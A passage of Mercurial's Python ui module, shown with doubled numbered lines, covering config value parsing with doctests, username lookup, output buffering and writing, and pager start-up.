549 'get a path config item, expanded relative to repo root or config file'
550 v = self.config(section, name, default, untrusted)
550 v = self.config(section, name, default, untrusted)
551 if v is None:
551 if v is None:
552 return None
552 return None
553 if not os.path.isabs(v) or "://" not in v:
553 if not os.path.isabs(v) or "://" not in v:
554 src = self.configsource(section, name, untrusted)
554 src = self.configsource(section, name, untrusted)
555 if ':' in src:
555 if ':' in src:
556 base = os.path.dirname(src.rsplit(':')[0])
556 base = os.path.dirname(src.rsplit(':')[0])
557 v = os.path.join(base, os.path.expanduser(v))
557 v = os.path.join(base, os.path.expanduser(v))
558 return v
558 return v
559
559
560 def configbool(self, section, name, default=_unset, untrusted=False):
560 def configbool(self, section, name, default=_unset, untrusted=False):
561 """parse a configuration element as a boolean
561 """parse a configuration element as a boolean
562
562
563 >>> u = ui(); s = b'foo'
563 >>> u = ui(); s = b'foo'
564 >>> u.setconfig(s, b'true', b'yes')
564 >>> u.setconfig(s, b'true', b'yes')
565 >>> u.configbool(s, b'true')
565 >>> u.configbool(s, b'true')
566 True
566 True
567 >>> u.setconfig(s, b'false', b'no')
567 >>> u.setconfig(s, b'false', b'no')
568 >>> u.configbool(s, b'false')
568 >>> u.configbool(s, b'false')
569 False
569 False
570 >>> u.configbool(s, b'unknown')
570 >>> u.configbool(s, b'unknown')
571 False
571 False
572 >>> u.configbool(s, b'unknown', True)
572 >>> u.configbool(s, b'unknown', True)
573 True
573 True
574 >>> u.setconfig(s, b'invalid', b'somevalue')
574 >>> u.setconfig(s, b'invalid', b'somevalue')
575 >>> u.configbool(s, b'invalid')
575 >>> u.configbool(s, b'invalid')
576 Traceback (most recent call last):
576 Traceback (most recent call last):
577 ...
577 ...
578 ConfigError: foo.invalid is not a boolean ('somevalue')
578 ConfigError: foo.invalid is not a boolean ('somevalue')
579 """
579 """
580
580
581 v = self._config(section, name, default, untrusted=untrusted)
581 v = self._config(section, name, default, untrusted=untrusted)
582 if v is None:
582 if v is None:
583 return v
583 return v
584 if v is _unset:
584 if v is _unset:
585 if default is _unset:
585 if default is _unset:
586 return False
586 return False
587 return default
587 return default
588 if isinstance(v, bool):
588 if isinstance(v, bool):
589 return v
589 return v
590 b = util.parsebool(v)
590 b = util.parsebool(v)
591 if b is None:
591 if b is None:
592 raise error.ConfigError(_("%s.%s is not a boolean ('%s')")
592 raise error.ConfigError(_("%s.%s is not a boolean ('%s')")
593 % (section, name, v))
593 % (section, name, v))
594 return b
594 return b
595
595
596 def configwith(self, convert, section, name, default=_unset,
596 def configwith(self, convert, section, name, default=_unset,
597 desc=None, untrusted=False):
597 desc=None, untrusted=False):
598 """parse a configuration element with a conversion function
598 """parse a configuration element with a conversion function
599
599
600 >>> u = ui(); s = b'foo'
600 >>> u = ui(); s = b'foo'
601 >>> u.setconfig(s, b'float1', b'42')
601 >>> u.setconfig(s, b'float1', b'42')
602 >>> u.configwith(float, s, b'float1')
602 >>> u.configwith(float, s, b'float1')
603 42.0
603 42.0
604 >>> u.setconfig(s, b'float2', b'-4.25')
604 >>> u.setconfig(s, b'float2', b'-4.25')
605 >>> u.configwith(float, s, b'float2')
605 >>> u.configwith(float, s, b'float2')
606 -4.25
606 -4.25
607 >>> u.configwith(float, s, b'unknown', 7)
607 >>> u.configwith(float, s, b'unknown', 7)
608 7.0
608 7.0
609 >>> u.setconfig(s, b'invalid', b'somevalue')
609 >>> u.setconfig(s, b'invalid', b'somevalue')
610 >>> u.configwith(float, s, b'invalid')
610 >>> u.configwith(float, s, b'invalid')
611 Traceback (most recent call last):
611 Traceback (most recent call last):
612 ...
612 ...
613 ConfigError: foo.invalid is not a valid float ('somevalue')
613 ConfigError: foo.invalid is not a valid float ('somevalue')
614 >>> u.configwith(float, s, b'invalid', desc=b'womble')
614 >>> u.configwith(float, s, b'invalid', desc=b'womble')
615 Traceback (most recent call last):
615 Traceback (most recent call last):
616 ...
616 ...
617 ConfigError: foo.invalid is not a valid womble ('somevalue')
617 ConfigError: foo.invalid is not a valid womble ('somevalue')
618 """
618 """
619
619
620 v = self.config(section, name, default, untrusted)
620 v = self.config(section, name, default, untrusted)
621 if v is None:
621 if v is None:
622 return v # do not attempt to convert None
622 return v # do not attempt to convert None
623 try:
623 try:
624 return convert(v)
624 return convert(v)
625 except (ValueError, error.ParseError):
625 except (ValueError, error.ParseError):
626 if desc is None:
626 if desc is None:
627 desc = pycompat.sysbytes(convert.__name__)
627 desc = pycompat.sysbytes(convert.__name__)
628 raise error.ConfigError(_("%s.%s is not a valid %s ('%s')")
628 raise error.ConfigError(_("%s.%s is not a valid %s ('%s')")
629 % (section, name, desc, v))
629 % (section, name, desc, v))
630
630
631 def configint(self, section, name, default=_unset, untrusted=False):
631 def configint(self, section, name, default=_unset, untrusted=False):
632 """parse a configuration element as an integer
632 """parse a configuration element as an integer
633
633
634 >>> u = ui(); s = b'foo'
634 >>> u = ui(); s = b'foo'
635 >>> u.setconfig(s, b'int1', b'42')
635 >>> u.setconfig(s, b'int1', b'42')
636 >>> u.configint(s, b'int1')
636 >>> u.configint(s, b'int1')
637 42
637 42
638 >>> u.setconfig(s, b'int2', b'-42')
638 >>> u.setconfig(s, b'int2', b'-42')
639 >>> u.configint(s, b'int2')
639 >>> u.configint(s, b'int2')
640 -42
640 -42
641 >>> u.configint(s, b'unknown', 7)
641 >>> u.configint(s, b'unknown', 7)
642 7
642 7
643 >>> u.setconfig(s, b'invalid', b'somevalue')
643 >>> u.setconfig(s, b'invalid', b'somevalue')
644 >>> u.configint(s, b'invalid')
644 >>> u.configint(s, b'invalid')
645 Traceback (most recent call last):
645 Traceback (most recent call last):
646 ...
646 ...
647 ConfigError: foo.invalid is not a valid integer ('somevalue')
647 ConfigError: foo.invalid is not a valid integer ('somevalue')
648 """
648 """
649
649
650 return self.configwith(int, section, name, default, 'integer',
650 return self.configwith(int, section, name, default, 'integer',
651 untrusted)
651 untrusted)
652
652
653 def configbytes(self, section, name, default=_unset, untrusted=False):
653 def configbytes(self, section, name, default=_unset, untrusted=False):
654 """parse a configuration element as a quantity in bytes
654 """parse a configuration element as a quantity in bytes
655
655
656 Units can be specified as b (bytes), k or kb (kilobytes), m or
656 Units can be specified as b (bytes), k or kb (kilobytes), m or
657 mb (megabytes), g or gb (gigabytes).
657 mb (megabytes), g or gb (gigabytes).
658
658
659 >>> u = ui(); s = b'foo'
659 >>> u = ui(); s = b'foo'
660 >>> u.setconfig(s, b'val1', b'42')
660 >>> u.setconfig(s, b'val1', b'42')
661 >>> u.configbytes(s, b'val1')
661 >>> u.configbytes(s, b'val1')
662 42
662 42
663 >>> u.setconfig(s, b'val2', b'42.5 kb')
663 >>> u.setconfig(s, b'val2', b'42.5 kb')
664 >>> u.configbytes(s, b'val2')
664 >>> u.configbytes(s, b'val2')
665 43520
665 43520
666 >>> u.configbytes(s, b'unknown', b'7 MB')
666 >>> u.configbytes(s, b'unknown', b'7 MB')
667 7340032
667 7340032
668 >>> u.setconfig(s, b'invalid', b'somevalue')
668 >>> u.setconfig(s, b'invalid', b'somevalue')
669 >>> u.configbytes(s, b'invalid')
669 >>> u.configbytes(s, b'invalid')
670 Traceback (most recent call last):
670 Traceback (most recent call last):
671 ...
671 ...
672 ConfigError: foo.invalid is not a byte quantity ('somevalue')
672 ConfigError: foo.invalid is not a byte quantity ('somevalue')
673 """
673 """
674
674
675 value = self._config(section, name, default, untrusted)
675 value = self._config(section, name, default, untrusted)
676 if value is _unset:
676 if value is _unset:
677 if default is _unset:
677 if default is _unset:
678 default = 0
678 default = 0
679 value = default
679 value = default
680 if not isinstance(value, bytes):
680 if not isinstance(value, bytes):
681 return value
681 return value
682 try:
682 try:
683 return util.sizetoint(value)
683 return util.sizetoint(value)
684 except error.ParseError:
684 except error.ParseError:
685 raise error.ConfigError(_("%s.%s is not a byte quantity ('%s')")
685 raise error.ConfigError(_("%s.%s is not a byte quantity ('%s')")
686 % (section, name, value))
686 % (section, name, value))
687
687
688 def configlist(self, section, name, default=_unset, untrusted=False):
688 def configlist(self, section, name, default=_unset, untrusted=False):
689 """parse a configuration element as a list of comma/space separated
689 """parse a configuration element as a list of comma/space separated
690 strings
690 strings
691
691
692 >>> u = ui(); s = b'foo'
692 >>> u = ui(); s = b'foo'
693 >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
693 >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
694 >>> u.configlist(s, b'list1')
694 >>> u.configlist(s, b'list1')
695 ['this', 'is', 'a small', 'test']
695 ['this', 'is', 'a small', 'test']
696 >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
696 >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
697 >>> u.configlist(s, b'list2')
697 >>> u.configlist(s, b'list2')
698 ['this', 'is', 'a small', 'test']
698 ['this', 'is', 'a small', 'test']
699 """
699 """
700 # default is not always a list
700 # default is not always a list
701 v = self.configwith(config.parselist, section, name, default,
701 v = self.configwith(config.parselist, section, name, default,
702 'list', untrusted)
702 'list', untrusted)
703 if isinstance(v, bytes):
703 if isinstance(v, bytes):
704 return config.parselist(v)
704 return config.parselist(v)
705 elif v is None:
705 elif v is None:
706 return []
706 return []
707 return v
707 return v
708
708
709 def configdate(self, section, name, default=_unset, untrusted=False):
709 def configdate(self, section, name, default=_unset, untrusted=False):
710 """parse a configuration element as a tuple of ints
710 """parse a configuration element as a tuple of ints
711
711
712 >>> u = ui(); s = b'foo'
712 >>> u = ui(); s = b'foo'
713 >>> u.setconfig(s, b'date', b'0 0')
713 >>> u.setconfig(s, b'date', b'0 0')
714 >>> u.configdate(s, b'date')
714 >>> u.configdate(s, b'date')
715 (0, 0)
715 (0, 0)
716 """
716 """
717 if self.config(section, name, default, untrusted):
717 if self.config(section, name, default, untrusted):
718 return self.configwith(dateutil.parsedate, section, name, default,
718 return self.configwith(dateutil.parsedate, section, name, default,
719 'date', untrusted)
719 'date', untrusted)
720 if default is _unset:
720 if default is _unset:
721 return None
721 return None
722 return default
722 return default
723
723
724 def hasconfig(self, section, name, untrusted=False):
724 def hasconfig(self, section, name, untrusted=False):
725 return self._data(untrusted).hasitem(section, name)
725 return self._data(untrusted).hasitem(section, name)
726
726
727 def has_section(self, section, untrusted=False):
727 def has_section(self, section, untrusted=False):
728 '''tell whether section exists in config.'''
728 '''tell whether section exists in config.'''
729 return section in self._data(untrusted)
729 return section in self._data(untrusted)
730
730
731 def configitems(self, section, untrusted=False, ignoresub=False):
731 def configitems(self, section, untrusted=False, ignoresub=False):
732 items = self._data(untrusted).items(section)
732 items = self._data(untrusted).items(section)
733 if ignoresub:
733 if ignoresub:
734 newitems = {}
734 newitems = {}
735 for k, v in items:
735 for k, v in items:
736 if ':' not in k:
736 if ':' not in k:
737 newitems[k] = v
737 newitems[k] = v
738 items = list(newitems.iteritems())
738 items = list(newitems.iteritems())
739 if self.debugflag and not untrusted and self._reportuntrusted:
739 if self.debugflag and not untrusted and self._reportuntrusted:
740 for k, v in self._ucfg.items(section):
740 for k, v in self._ucfg.items(section):
741 if self._tcfg.get(section, k) != v:
741 if self._tcfg.get(section, k) != v:
742 self.debug("ignoring untrusted configuration option "
742 self.debug("ignoring untrusted configuration option "
743 "%s.%s = %s\n" % (section, k, v))
743 "%s.%s = %s\n" % (section, k, v))
744 return items
744 return items
745
745
746 def walkconfig(self, untrusted=False):
746 def walkconfig(self, untrusted=False):
747 cfg = self._data(untrusted)
747 cfg = self._data(untrusted)
748 for section in cfg.sections():
748 for section in cfg.sections():
749 for name, value in self.configitems(section, untrusted):
749 for name, value in self.configitems(section, untrusted):
750 yield section, name, value
750 yield section, name, value
751
751
752 def plain(self, feature=None):
752 def plain(self, feature=None):
753 '''is plain mode active?
753 '''is plain mode active?
754
754
755 Plain mode means that all configuration variables which affect
755 Plain mode means that all configuration variables which affect
756 the behavior and output of Mercurial should be
756 the behavior and output of Mercurial should be
757 ignored. Additionally, the output should be stable,
757 ignored. Additionally, the output should be stable,
758 reproducible and suitable for use in scripts or applications.
758 reproducible and suitable for use in scripts or applications.
759
759
760 The only way to trigger plain mode is by setting either the
760 The only way to trigger plain mode is by setting either the
761 `HGPLAIN' or `HGPLAINEXCEPT' environment variables.
761 `HGPLAIN' or `HGPLAINEXCEPT' environment variables.
762
762
763 The return value can either be
763 The return value can either be
764 - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
764 - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
765 - False if feature is disabled by default and not included in HGPLAIN
765 - False if feature is disabled by default and not included in HGPLAIN
766 - True otherwise
766 - True otherwise
767 '''
767 '''
768 if ('HGPLAIN' not in encoding.environ and
768 if ('HGPLAIN' not in encoding.environ and
769 'HGPLAINEXCEPT' not in encoding.environ):
769 'HGPLAINEXCEPT' not in encoding.environ):
770 return False
770 return False
771 exceptions = encoding.environ.get('HGPLAINEXCEPT',
771 exceptions = encoding.environ.get('HGPLAINEXCEPT',
772 '').strip().split(',')
772 '').strip().split(',')
773 # TODO: add support for HGPLAIN=+feature,-feature syntax
773 # TODO: add support for HGPLAIN=+feature,-feature syntax
774 if '+strictflags' not in encoding.environ.get('HGPLAIN', '').split(','):
774 if '+strictflags' not in encoding.environ.get('HGPLAIN', '').split(','):
775 exceptions.append('strictflags')
775 exceptions.append('strictflags')
776 if feature and exceptions:
776 if feature and exceptions:
777 return feature not in exceptions
777 return feature not in exceptions
778 return True
778 return True
779
779
780 def username(self, acceptempty=False):
780 def username(self, acceptempty=False):
781 """Return default username to be used in commits.
781 """Return default username to be used in commits.
782
782
783 Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
783 Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
784 and stop searching if one of these is set.
784 and stop searching if one of these is set.
785 If not found and acceptempty is True, returns None.
785 If not found and acceptempty is True, returns None.
786 If not found and ui.askusername is True, ask the user, else use
786 If not found and ui.askusername is True, ask the user, else use
787 ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
787 ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
788 If no username could be found, raise an Abort error.
788 If no username could be found, raise an Abort error.
789 """
789 """
790 user = encoding.environ.get("HGUSER")
790 user = encoding.environ.get("HGUSER")
791 if user is None:
791 if user is None:
792 user = self.config("ui", "username")
792 user = self.config("ui", "username")
793 if user is not None:
793 if user is not None:
794 user = os.path.expandvars(user)
794 user = os.path.expandvars(user)
795 if user is None:
795 if user is None:
796 user = encoding.environ.get("EMAIL")
796 user = encoding.environ.get("EMAIL")
797 if user is None and acceptempty:
797 if user is None and acceptempty:
798 return user
798 return user
799 if user is None and self.configbool("ui", "askusername"):
799 if user is None and self.configbool("ui", "askusername"):
800 user = self.prompt(_("enter a commit username:"), default=None)
800 user = self.prompt(_("enter a commit username:"), default=None)
801 if user is None and not self.interactive():
801 if user is None and not self.interactive():
802 try:
802 try:
803 user = '%s@%s' % (util.getuser(),
803 user = '%s@%s' % (util.getuser(),
804 encoding.strtolocal(socket.getfqdn()))
804 encoding.strtolocal(socket.getfqdn()))
805 self.warn(_("no username found, using '%s' instead\n") % user)
805 self.warn(_("no username found, using '%s' instead\n") % user)
806 except KeyError:
806 except KeyError:
807 pass
807 pass
808 if not user:
808 if not user:
809 raise error.Abort(_('no username supplied'),
809 raise error.Abort(_('no username supplied'),
810 hint=_("use 'hg config --edit' "
810 hint=_("use 'hg config --edit' "
811 'to set your username'))
811 'to set your username'))
812 if "\n" in user:
812 if "\n" in user:
813 raise error.Abort(_("username %r contains a newline\n")
813 raise error.Abort(_("username %r contains a newline\n")
814 % pycompat.bytestr(user))
814 % pycompat.bytestr(user))
815 return user
815 return user
816
816
817 def shortuser(self, user):
817 def shortuser(self, user):
818 """Return a short representation of a user name or email address."""
818 """Return a short representation of a user name or email address."""
819 if not self.verbose:
819 if not self.verbose:
820 user = util.shortuser(user)
820 user = util.shortuser(user)
821 return user
821 return user
822
822
823 def expandpath(self, loc, default=None):
823 def expandpath(self, loc, default=None):
824 """Return repository location relative to cwd or from [paths]"""
824 """Return repository location relative to cwd or from [paths]"""
825 try:
825 try:
826 p = self.paths.getpath(loc)
826 p = self.paths.getpath(loc)
827 if p:
827 if p:
828 return p.rawloc
828 return p.rawloc
829 except error.RepoError:
829 except error.RepoError:
830 pass
830 pass
831
831
832 if default:
832 if default:
833 try:
833 try:
834 p = self.paths.getpath(default)
834 p = self.paths.getpath(default)
835 if p:
835 if p:
836 return p.rawloc
836 return p.rawloc
837 except error.RepoError:
837 except error.RepoError:
838 pass
838 pass
839
839
840 return loc
840 return loc
841
841
842 @util.propertycache
842 @util.propertycache
843 def paths(self):
843 def paths(self):
844 return paths(self)
844 return paths(self)
845
845
846 def pushbuffer(self, error=False, subproc=False, labeled=False):
846 def pushbuffer(self, error=False, subproc=False, labeled=False):
847 """install a buffer to capture standard output of the ui object
847 """install a buffer to capture standard output of the ui object
848
848
849 If error is True, the error output will be captured too.
849 If error is True, the error output will be captured too.
850
850
851 If subproc is True, output from subprocesses (typically hooks) will be
851 If subproc is True, output from subprocesses (typically hooks) will be
852 captured too.
852 captured too.
853
853
854 If labeled is True, any labels associated with buffered
854 If labeled is True, any labels associated with buffered
855 output will be handled. By default, this has no effect
855 output will be handled. By default, this has no effect
856 on the output returned, but extensions and GUI tools may
856 on the output returned, but extensions and GUI tools may
857 handle this argument and returned styled output. If output
857 handle this argument and returned styled output. If output
858 is being buffered so it can be captured and parsed or
858 is being buffered so it can be captured and parsed or
859 processed, labeled should not be set to True.
859 processed, labeled should not be set to True.
860 """
860 """
861 self._buffers.append([])
861 self._buffers.append([])
862 self._bufferstates.append((error, subproc, labeled))
862 self._bufferstates.append((error, subproc, labeled))
863 self._bufferapplylabels = labeled
863 self._bufferapplylabels = labeled
864
864
865 def popbuffer(self):
865 def popbuffer(self):
866 '''pop the last buffer and return the buffered output'''
866 '''pop the last buffer and return the buffered output'''
867 self._bufferstates.pop()
867 self._bufferstates.pop()
868 if self._bufferstates:
868 if self._bufferstates:
869 self._bufferapplylabels = self._bufferstates[-1][2]
869 self._bufferapplylabels = self._bufferstates[-1][2]
870 else:
870 else:
871 self._bufferapplylabels = None
871 self._bufferapplylabels = None
872
872
873 return "".join(self._buffers.pop())
873 return "".join(self._buffers.pop())
874
874
875 def canwritewithoutlabels(self):
875 def canwritewithoutlabels(self):
876 '''check if write skips the label'''
876 '''check if write skips the label'''
877 if self._buffers and not self._bufferapplylabels:
877 if self._buffers and not self._bufferapplylabels:
878 return True
878 return True
879 return self._colormode is None
879 return self._colormode is None
880
880
881 def canbatchlabeledwrites(self):
881 def canbatchlabeledwrites(self):
882 '''check if write calls with labels are batchable'''
882 '''check if write calls with labels are batchable'''
883 # Windows color printing is special, see ``write``.
883 # Windows color printing is special, see ``write``.
884 return self._colormode != 'win32'
884 return self._colormode != 'win32'
885
885
886 def write(self, *args, **opts):
886 def write(self, *args, **opts):
887 '''write args to output
887 '''write args to output
888
888
889 By default, this method simply writes to the buffer or stdout.
889 By default, this method simply writes to the buffer or stdout.
890 Color mode can be set on the UI class to have the output decorated
890 Color mode can be set on the UI class to have the output decorated
891 with color modifier before being written to stdout.
891 with color modifier before being written to stdout.
892
892
893 The color used is controlled by an optional keyword argument, "label".
893 The color used is controlled by an optional keyword argument, "label".
894 This should be a string containing label names separated by space.
894 This should be a string containing label names separated by space.
895 Label names take the form of "topic.type". For example, ui.debug()
895 Label names take the form of "topic.type". For example, ui.debug()
896 issues a label of "ui.debug".
896 issues a label of "ui.debug".
897
897
898 When labeling output for a specific command, a label of
898 When labeling output for a specific command, a label of
899 "cmdname.type" is recommended. For example, status issues
899 "cmdname.type" is recommended. For example, status issues
900 a label of "status.modified" for modified files.
900 a label of "status.modified" for modified files.
901 '''
901 '''
902 if self._buffers:
902 if self._buffers:
903 if self._bufferapplylabels:
903 if self._bufferapplylabels:
904 label = opts.get(r'label', '')
904 label = opts.get(r'label', '')
905 self._buffers[-1].extend(self.label(a, label) for a in args)
905 self._buffers[-1].extend(self.label(a, label) for a in args)
906 else:
906 else:
907 self._buffers[-1].extend(args)
907 self._buffers[-1].extend(args)
908 else:
908 else:
909 self._writenobuf(*args, **opts)
909 self._writenobuf(*args, **opts)
910
910
911 def _writenobuf(self, *args, **opts):
911 def _writenobuf(self, *args, **opts):
912 if self._colormode == 'win32':
912 if self._colormode == 'win32':
913 # windows color printing is its own can of crab, defer to
913 # windows color printing is its own can of crab, defer to
914 # the color module and that is it.
914 # the color module and that is it.
915 color.win32print(self, self._write, *args, **opts)
915 color.win32print(self, self._write, *args, **opts)
916 else:
916 else:
917 msgs = args
917 msgs = args
918 if self._colormode is not None:
918 if self._colormode is not None:
919 label = opts.get(r'label', '')
919 label = opts.get(r'label', '')
920 msgs = [self.label(a, label) for a in args]
920 msgs = [self.label(a, label) for a in args]
921 self._write(*msgs, **opts)
921 self._write(*msgs, **opts)
922
922
923 def _write(self, *msgs, **opts):
923 def _write(self, *msgs, **opts):
924 self._progclear()
924 self._progclear()
925 # opencode timeblockedsection because this is a critical path
925 # opencode timeblockedsection because this is a critical path
926 starttime = util.timer()
926 starttime = util.timer()
927 try:
927 try:
928 self.fout.write(''.join(msgs))
928 self.fout.write(''.join(msgs))
929 except IOError as err:
929 except IOError as err:
930 raise error.StdioError(err)
930 raise error.StdioError(err)
931 finally:
931 finally:
932 self._blockedtimes['stdio_blocked'] += \
932 self._blockedtimes['stdio_blocked'] += \
933 (util.timer() - starttime) * 1000
933 (util.timer() - starttime) * 1000
934
934
935 def write_err(self, *args, **opts):
935 def write_err(self, *args, **opts):
936 self._progclear()
936 self._progclear()
937 if self._bufferstates and self._bufferstates[-1][0]:
937 if self._bufferstates and self._bufferstates[-1][0]:
938 self.write(*args, **opts)
938 self.write(*args, **opts)
939 elif self._colormode == 'win32':
939 elif self._colormode == 'win32':
940 # windows color printing is its own can of crab, defer to
940 # windows color printing is its own can of crab, defer to
941 # the color module and that is it.
941 # the color module and that is it.
942 color.win32print(self, self._write_err, *args, **opts)
942 color.win32print(self, self._write_err, *args, **opts)
943 else:
943 else:
944 msgs = args
944 msgs = args
945 if self._colormode is not None:
945 if self._colormode is not None:
946 label = opts.get(r'label', '')
946 label = opts.get(r'label', '')
947 msgs = [self.label(a, label) for a in args]
947 msgs = [self.label(a, label) for a in args]
948 self._write_err(*msgs, **opts)
948 self._write_err(*msgs, **opts)
949
949
950 def _write_err(self, *msgs, **opts):
950 def _write_err(self, *msgs, **opts):
951 try:
951 try:
952 with self.timeblockedsection('stdio'):
952 with self.timeblockedsection('stdio'):
953 if not getattr(self.fout, 'closed', False):
953 if not getattr(self.fout, 'closed', False):
954 self.fout.flush()
954 self.fout.flush()
955 for a in msgs:
955 for a in msgs:
956 self.ferr.write(a)
956 self.ferr.write(a)
957 # stderr may be buffered under win32 when redirected to files,
957 # stderr may be buffered under win32 when redirected to files,
958 # including stdout.
958 # including stdout.
959 if not getattr(self.ferr, 'closed', False):
959 if not getattr(self.ferr, 'closed', False):
960 self.ferr.flush()
960 self.ferr.flush()
961 except IOError as inst:
961 except IOError as inst:
962 if inst.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
962 if inst.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
963 raise error.StdioError(inst)
963 raise error.StdioError(inst)
964
964
965 def flush(self):
965 def flush(self):
966 # opencode timeblockedsection because this is a critical path
966 # opencode timeblockedsection because this is a critical path
967 starttime = util.timer()
967 starttime = util.timer()
968 try:
968 try:
969 try:
969 try:
970 self.fout.flush()
970 self.fout.flush()
971 except IOError as err:
971 except IOError as err:
972 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
972 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
973 raise error.StdioError(err)
973 raise error.StdioError(err)
974 finally:
974 finally:
975 try:
975 try:
976 self.ferr.flush()
976 self.ferr.flush()
977 except IOError as err:
977 except IOError as err:
978 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
978 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
979 raise error.StdioError(err)
979 raise error.StdioError(err)
980 finally:
980 finally:
981 self._blockedtimes['stdio_blocked'] += \
981 self._blockedtimes['stdio_blocked'] += \
982 (util.timer() - starttime) * 1000
982 (util.timer() - starttime) * 1000
983
983
984 def _isatty(self, fh):
984 def _isatty(self, fh):
985 if self.configbool('ui', 'nontty'):
985 if self.configbool('ui', 'nontty'):
986 return False
986 return False
987 return util.isatty(fh)
987 return util.isatty(fh)
988
988
989 def disablepager(self):
989 def disablepager(self):
990 self._disablepager = True
990 self._disablepager = True
991
991
992 def pager(self, command):
992 def pager(self, command):
993 """Start a pager for subsequent command output.
993 """Start a pager for subsequent command output.
994
994
995 Commands which produce a long stream of output should call
995 Commands which produce a long stream of output should call
996 this function to activate the user's preferred pagination
996 this function to activate the user's preferred pagination
997 mechanism (which may be no pager). Calling this function
997 mechanism (which may be no pager). Calling this function
998 precludes any future use of interactive functionality, such as
998 precludes any future use of interactive functionality, such as
999 prompting the user or activating curses.
999 prompting the user or activating curses.
1000
1000
1001 Args:
1001 Args:
1002 command: The full, non-aliased name of the command. That is, "log"
1002 command: The full, non-aliased name of the command. That is, "log"
1003 not "history, "summary" not "summ", etc.
1003 not "history, "summary" not "summ", etc.
1004 """
1004 """
1005 if (self._disablepager
1005 if (self._disablepager
1006 or self.pageractive):
1006 or self.pageractive):
1007 # how pager should do is already determined
1007 # how pager should do is already determined
1008 return
1008 return
1009
1009
1010 if not command.startswith('internal-always-') and (
1010 if not command.startswith('internal-always-') and (
1011 # explicit --pager=on (= 'internal-always-' prefix) should
1011 # explicit --pager=on (= 'internal-always-' prefix) should
1012 # take precedence over disabling factors below
1012 # take precedence over disabling factors below
1013 command in self.configlist('pager', 'ignore')
1013 command in self.configlist('pager', 'ignore')
1014 or not self.configbool('ui', 'paginate')
1014 or not self.configbool('ui', 'paginate')
1015 or not self.configbool('pager', 'attend-' + command, True)
1015 or not self.configbool('pager', 'attend-' + command, True)
1016 # TODO: if we want to allow HGPLAINEXCEPT=pager,
1016 # TODO: if we want to allow HGPLAINEXCEPT=pager,
1017 # formatted() will need some adjustment.
1017 # formatted() will need some adjustment.
1018 or not self.formatted()
1018 or not self.formatted()
1019 or self.plain()
1019 or self.plain()
1020 or self._buffers
1020 or self._buffers
1021 # TODO: expose debugger-enabled on the UI object
1021 # TODO: expose debugger-enabled on the UI object
1022 or '--debugger' in pycompat.sysargv):
1022 or '--debugger' in pycompat.sysargv):
1023 # We only want to paginate if the ui appears to be
1023 # We only want to paginate if the ui appears to be
1024 # interactive, the user didn't say HGPLAIN or
1024 # interactive, the user didn't say HGPLAIN or
1025 # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
1025 # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
1026 return
1026 return
1027
1027
1028 pagercmd = self.config('pager', 'pager', rcutil.fallbackpager)
1028 pagercmd = self.config('pager', 'pager', rcutil.fallbackpager)
1029 if not pagercmd:
1029 if not pagercmd:
1030 return
1030 return
1031
1031
1032 pagerenv = {}
1032 pagerenv = {}
1033 for name, value in rcutil.defaultpagerenv().items():
1033 for name, value in rcutil.defaultpagerenv().items():
1034 if name not in encoding.environ:
1034 if name not in encoding.environ:
1035 pagerenv[name] = value
1035 pagerenv[name] = value
1036
1036
1037 self.debug('starting pager for command %r\n' % command)
1037 self.debug('starting pager for command %r\n' % command)
1038 self.flush()
1038 self.flush()
1039
1039
1040 wasformatted = self.formatted()
1040 wasformatted = self.formatted()
1041 if util.safehasattr(signal, "SIGPIPE"):
1041 if util.safehasattr(signal, "SIGPIPE"):
1042 signal.signal(signal.SIGPIPE, _catchterm)
1042 signal.signal(signal.SIGPIPE, _catchterm)
1043 if self._runpager(pagercmd, pagerenv):
1043 if self._runpager(pagercmd, pagerenv):
1044 self.pageractive = True
1044 self.pageractive = True
1045 # Preserve the formatted-ness of the UI. This is important
1045 # Preserve the formatted-ness of the UI. This is important
1046 # because we mess with stdout, which might confuse
1046 # because we mess with stdout, which might confuse
1047 # auto-detection of things being formatted.
1047 # auto-detection of things being formatted.
1048 self.setconfig('ui', 'formatted', wasformatted, 'pager')
1048 self.setconfig('ui', 'formatted', wasformatted, 'pager')
1049 self.setconfig('ui', 'interactive', False, 'pager')
1049 self.setconfig('ui', 'interactive', False, 'pager')
1050
1050
1051 # If pagermode differs from color.mode, reconfigure color now that
1051 # If pagermode differs from color.mode, reconfigure color now that
1052 # pageractive is set.
1052 # pageractive is set.
1053 cm = self._colormode
1053 cm = self._colormode
1054 if cm != self.config('color', 'pagermode', cm):
1054 if cm != self.config('color', 'pagermode', cm):
1055 color.setup(self)
1055 color.setup(self)
1056 else:
1056 else:
1057 # If the pager can't be spawned in dispatch when --pager=on is
1057 # If the pager can't be spawned in dispatch when --pager=on is
1058 # given, don't try again when the command runs, to avoid a duplicate
1058 # given, don't try again when the command runs, to avoid a duplicate
1059 # warning about a missing pager command.
1059 # warning about a missing pager command.
1060 self.disablepager()
1060 self.disablepager()
1061
1061
1062 def _runpager(self, command, env=None):
1062 def _runpager(self, command, env=None):
1063 """Actually start the pager and set up file descriptors.
1063 """Actually start the pager and set up file descriptors.
1064
1064
1065 This is separate in part so that extensions (like chg) can
1065 This is separate in part so that extensions (like chg) can
1066 override how a pager is invoked.
1066 override how a pager is invoked.
1067 """
1067 """
1068 if command == 'cat':
1068 if command == 'cat':
1069 # Save ourselves some work.
1069 # Save ourselves some work.
1070 return False
1070 return False
1071 # If the command doesn't contain any of these characters, we
1071 # If the command doesn't contain any of these characters, we
1072 # assume it's a binary and exec it directly. This means for
1072 # assume it's a binary and exec it directly. This means for
1073 # simple pager command configurations, we can degrade
1073 # simple pager command configurations, we can degrade
